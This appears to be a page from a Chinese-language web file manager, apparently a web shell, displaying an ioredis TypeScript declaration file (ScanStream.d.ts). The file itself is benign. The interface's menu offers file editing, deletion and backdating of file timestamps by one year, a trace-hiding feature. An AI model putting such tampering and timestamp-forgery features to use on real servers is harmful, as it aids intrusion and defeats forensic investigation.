文件操作 - ScanStream.d.ts
返回文件管理
返回主菜单
删除本文件
文件: /var/www/OLD/node_modules/ioredis/built/ScanStream.d.ts
编辑文件内容
/// <reference types="node" /> import { Readable, ReadableOptions } from "stream"; interface Options extends ReadableOptions { key?: string; match?: string; type?: string; command: string; redis: any; count?: string | number; } /** * Convenient class to convert the process of scanning keys to a readable stream. */ export default class ScanStream extends Readable { private opt; private _redisCursor; private _redisDrained; constructor(opt: Options); _read(): void; close(): void; } export {};
修改文件时间
将文件时间修改为当前时间的前一年
删除文件